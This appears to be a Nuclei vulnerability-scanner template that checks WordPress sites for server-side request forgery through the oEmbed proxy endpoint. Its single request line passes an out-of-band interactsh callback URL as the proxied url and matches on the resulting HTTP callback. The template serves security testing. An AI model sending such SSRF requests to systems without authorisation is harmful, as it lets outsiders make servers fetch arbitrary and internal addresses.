id: wordpress-ssrf-oembed

info:
  name: Wordpress Oembed Proxy SSRF
  author: dhiyaneshDk
  severity: medium
  reference:
    - https://book.hacktricks.xyz/pentesting/pentesting-web/wordpress
    - https://github.com/incogbyte/quickpress/blob/master/core/req.go
  tags: wordpress,ssrf,oast,proxy

requests:
  - method: GET
    path:
      - "{{BaseURL}}/wp-json/oembed/1.0/proxy?url=http://{{interactsh-url}}/"

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"